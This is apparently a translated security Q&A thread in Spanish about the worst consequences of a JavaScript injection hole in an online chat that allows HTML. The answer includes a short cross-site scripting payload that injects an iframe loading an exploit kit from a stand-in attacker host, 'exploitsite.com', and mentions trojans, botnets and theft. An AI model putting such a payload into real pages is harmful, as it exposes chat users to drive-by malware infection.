¿Consecuencia de seguridad del agujero de Javascript en un chat en línea?

4

Para un chat en línea que permite HTML básico, ¿qué sucede si dejan una forma abierta para que un pirata informático potencial ejecute javascript en todas las personas que están en el chat?
¿Qué es lo peor que podrían hacer?

    
pregunta jackcogdill 02.06.2013 - 01:29
fuente

1 respuesta

4

Crea un nuevo iframe y carga el kit de explotación dentro de iframe.

<script language="JavaScript" type="text/javascript">
ifrm = document.createElement("IFRAME");
   ifrm.setAttribute("src", "http://exploitsite.com/");
   ifrm.style.width = 640+"px";
   ifrm.style.height = 480+"px";
   document.body.appendChild(ifrm);
</script>

Infecta a los usuarios con troyanos, úsalos como bots, roba su dinero, etc. ...

    
respondido por el Daniel 02.06.2013 - 01:48
fuente

Lea otras preguntas en las etiquetas